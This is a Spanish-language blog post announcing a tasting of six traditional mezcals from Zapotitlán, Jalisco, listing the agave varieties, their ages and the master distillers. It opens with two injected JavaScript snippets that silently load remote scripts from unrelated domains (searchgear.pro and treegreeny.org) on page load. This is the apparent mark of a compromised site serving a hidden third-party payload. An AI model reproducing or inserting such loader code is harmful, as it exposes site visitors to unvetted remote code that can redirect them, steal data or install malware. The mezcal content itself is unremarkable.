;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 161. De Zapotitlán, Jalisco, su mezcal

161. De Zapotitlán, Jalisco, su mezcal


Hoy, a iniciativa de maestros taberneros del municipio de Zapotitlán, Jalisco, nos  reuniremos a las 14:00 horas para saborear seis mezcales tradicionales (MT) elaborados por ellos. Como sede, tendremos la Casa de Cultura de Zapotitlán y el invaluable apoyo del gobierno municipal.

Los MT a saborear fueron elaborados exclusivamente con magueyes capones cuyas edades, en años, se especifican entre paréntesis; y son:

1. Mezcal de maguey Ixtero Amarillo cultivado (12), elaborado en Loma la Guadalupe, Zapotitlán, por el maestro tabernero Cándido Romero Contreras.

2. Mezcal de dos magueyes: Ixtero Verde cultivado (14) e Ixtero Amarillo cultivado (12), elaborado en Chancuellar, Zapotitlán, por el maestro tabernero Lorenzo Virgen Contreras.

3. Mezcal de cuatro magueyes: Ixtero Amarillo cultivado (12), Azul Telcruz cultivado (10), Brocha cultivado (8) y Lineño cultivado (6). Elaborado en Zapotitlán de Vadillo por el maestro tabernero Macario Partida Ramos.

4. Mezcal de siete magueyes: Ixtero Amarillo cultivado (12), Bravo Verde cultivado (12), Cimarrón cultivado (7), Cuatesoca cultivado (9), Cuchara cultivado (9), Cimarrón Cenizo cultivado (6) y Cabresto cultivado (10). Elaborado en Tetapán, Zapotitlán, por el maestro tabernero Rosario Pineda Pérez.

5. Mezcal de Maguey Ixtero Amarillo cultivado (12), elaborado en Chancuellar, Zapotitlán, por el maestro tabernero Tomas Virgen Méndez.

6. Mezcal de dos magueyes: Ixtero Amarillo cultivado (12) e Ixtero Verde cultivado (14), elaborado en Chancuellar, Zapotitlán, por el maestro tabernero Héctor Benítez Contreras.

A la saboreada acudirán habitantes de Zapotitlán y de otras regiones de Jalisco, así como restauranteros, promotores culturales, científicos y demás interesados en los MT provenientes de diferentes partes de México.

Para complementar la saboreada, mañana domingo visitaremos la taberna (fábrica de mezcal) de Don Rosario Pineda, quien nos explicará cómo se hace el MT en esta región, donde también el destilado recibe el nombre de tuxca.

http://www.milenio.com/cdb/doc/impreso/9169469

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *